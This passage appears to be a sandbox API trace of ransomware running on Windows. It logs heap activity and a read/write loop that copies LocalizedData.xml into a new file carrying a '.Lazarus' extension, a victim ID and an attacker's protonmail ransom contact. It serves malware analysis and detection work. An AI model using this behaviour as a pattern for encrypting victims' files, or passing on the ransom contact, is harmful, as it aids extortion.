hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0067.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0067.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0067.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0067.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0067.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0067.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0067.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0067.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0067.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0067.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0067.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0067.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0067.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0067.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0067.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0067.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0067.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0067.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0067.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0067.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0067.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0067.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0067.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0067.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0067.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0067.113] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.113] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.113] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.113] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0067.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0067.113] AreFileApisANSI () returned 1 [0067.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0067.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0067.113] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.113] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0067.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0067.114] AreFileApisANSI () returned 1 [0067.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0067.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71bd0 [0067.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x71bd0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 45 [0067.114] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0067.114] GetFileType (hFile=0x428) returned 0x1 [0067.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0067.114] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0067.114] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0067.114] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0067.114] CloseHandle (hObject=0x428) returned 1 [0067.115] AreFileApisANSI () returned 1 [0067.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0067.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x716f0 [0067.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x716f0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 45 [0067.115] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0067.115] GetFileType (hFile=0x428) returned 0x1 [0067.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0067.115] CloseHandle (hObject=0x428) returned 1 [0067.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0067.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0067.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0067.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0067.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0067.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0067.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0067.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0067.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0067.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0067.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0067.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0067.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0067.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0067.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0067.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0067.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0067.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0067.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0067.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0067.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0067.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0067.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0067.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0067.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0067.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0067.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0067.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0067.116] AreFileApisANSI () returned 1 [0067.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0067.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x719c8 [0067.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x719c8, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 45 [0067.116] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x151aa)) returned 1 [0067.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0067.116] AreFileApisANSI () returned 1 [0067.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0067.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0067.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0067.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0067.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0067.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0067.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0067.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0067.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0067.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0067.116] GetLastError () returned 0x0 [0067.116] SetLastError (dwErrCode=0x0) [0067.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4dea8 [0067.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8c430 [0067.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bd10 [0067.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d660 [0067.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6d8 [0067.117] GetLastError () returned 0x0 [0067.117] SetLastError (dwErrCode=0x0) [0067.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0067.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0067.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71bd0 [0067.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0067.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0067.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0067.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0067.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0067.117] AreFileApisANSI () returned 1 [0067.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0067.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x51398 [0067.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=107 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 107 [0067.117] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0067.117] GetFileType (hFile=0x428) returned 0x1 [0067.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0067.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0067.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0067.118] AreFileApisANSI () returned 1 [0067.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0067.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71620 [0067.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 45 [0067.118] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0067.118] GetFileType (hFile=0x420) returned 0x1 [0067.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0067.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0067.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0067.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0067.118] GetLastError () returned 0x0 [0067.118] SetLastError (dwErrCode=0x0) [0067.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0067.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0067.118] GetLastError () returned 0x0 [0067.118] SetLastError (dwErrCode=0x0) [0067.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0067.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0067.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0067.119] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0067.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0067.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5b8 [0067.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x85fc0 [0067.130] GetLastError () returned 0x0 [0067.130] SetLastError (dwErrCode=0x0) [0067.130] GetLastError () returned 0x0 [0067.130] SetLastError (dwErrCode=0x0) [0067.130] GetLastError () returned 0x0 [0067.131] SetLastError (dwErrCode=0x0) [0067.131] GetLastError () returned 0x0 [0067.131] SetLastError (dwErrCode=0x0) [0067.131] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.131] WriteFile (in: hFile=0x428, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.132] GetLastError () returned 0x0 [0067.132] SetLastError (dwErrCode=0x0) [0067.132] GetLastError () returned 0x0 [0067.132] SetLastError (dwErrCode=0x0) [0067.132] GetLastError () returned 0x0 [0067.132] SetLastError (dwErrCode=0x0) [0067.132] GetLastError () returned 0x0 [0067.132] SetLastError (dwErrCode=0x0) [0067.133] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.133] WriteFile (in: hFile=0x428, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.133] GetLastError () returned 0x0 [0067.133] SetLastError (dwErrCode=0x0) [0067.133] GetLastError () returned 0x0 [0067.133] SetLastError (dwErrCode=0x0) [0067.133] GetLastError () returned 0x0 [0067.133] SetLastError (dwErrCode=0x0) [0067.133] GetLastError () returned 0x0 [0067.133] SetLastError (dwErrCode=0x0) [0067.133] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.134] WriteFile (in: hFile=0x428, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.134] GetLastError () returned 0x0 [0067.134] SetLastError (dwErrCode=0x0) [0067.134] GetLastError () returned 0x0 [0067.134] SetLastError (dwErrCode=0x0) [0067.134] GetLastError () returned 0x0 [0067.134] SetLastError (dwErrCode=0x0) [0067.134] GetLastError () returned 0x0 [0067.134] SetLastError (dwErrCode=0x0) [0067.134] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.134] WriteFile (in: hFile=0x428, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.135] GetLastError () returned 0x0 [0067.135] SetLastError (dwErrCode=0x0) [0067.135] GetLastError () returned 0x0 [0067.135] SetLastError (dwErrCode=0x0) [0067.135] GetLastError () returned 0x0 [0067.135] SetLastError (dwErrCode=0x0) [0067.135] GetLastError () returned 0x0 [0067.135] SetLastError (dwErrCode=0x0) [0067.135] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.135] WriteFile (in: hFile=0x428, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.136] GetLastError () returned 0x0 [0067.136] SetLastError (dwErrCode=0x0) [0067.136] GetLastError () returned 0x0 [0067.136] SetLastError (dwErrCode=0x0) [0067.136] GetLastError () returned 0x0 [0067.136] SetLastError (dwErrCode=0x0) [0067.136] GetLastError () returned 0x0 [0067.136] SetLastError (dwErrCode=0x0) [0067.136] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.136] WriteFile (in: hFile=0x428, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.136] GetLastError () returned 0x0 [0067.136] SetLastError (dwErrCode=0x0) [0067.137] GetLastError () returned 0x0 [0067.137] SetLastError (dwErrCode=0x0) [0067.137] GetLastError () returned 0x0 [0067.137] SetLastError (dwErrCode=0x0) [0067.137] GetLastError () returned 0x0 [0067.137] SetLastError (dwErrCode=0x0) [0067.137] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.137] WriteFile (in: hFile=0x428, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.137] GetLastError () returned 0x0 [0067.137] SetLastError (dwErrCode=0x0) [0067.137] GetLastError () returned 0x0 [0067.137] SetLastError (dwErrCode=0x0) [0067.138] GetLastError () returned 0x0 [0067.138] SetLastError (dwErrCode=0x0) [0067.138] GetLastError () returned 0x0 [0067.138] SetLastError (dwErrCode=0x0) [0067.138] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.138] WriteFile (in: hFile=0x428, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.138] GetLastError () returned 0x0 [0067.138] SetLastError (dwErrCode=0x0) [0067.138] GetLastError () returned 0x0 [0067.138] SetLastError (dwErrCode=0x0) [0067.138] GetLastError () returned 0x0 [0067.138] SetLastError (dwErrCode=0x0) [0067.138] GetLastError () returned 0x0 [0067.139] SetLastError (dwErrCode=0x0) [0067.139] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.139] WriteFile (in: hFile=0x428, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.139] GetLastError () returned 0x0 [0067.139] SetLastError (dwErrCode=0x0) [0067.139] GetLastError () returned 0x0 [0067.139] SetLastError (dwErrCode=0x0) [0067.139] GetLastError () returned 0x0 [0067.139] SetLastError (dwErrCode=0x0) [0067.139] GetLastError () returned 0x0 [0067.139] SetLastError (dwErrCode=0x0) [0067.140] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.140] WriteFile (in: hFile=0x428, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.140] GetLastError () returned 0x0 [0067.140] SetLastError (dwErrCode=0x0) [0067.140] GetLastError () returned 0x0 [0067.140] SetLastError (dwErrCode=0x0) [0067.140] GetLastError 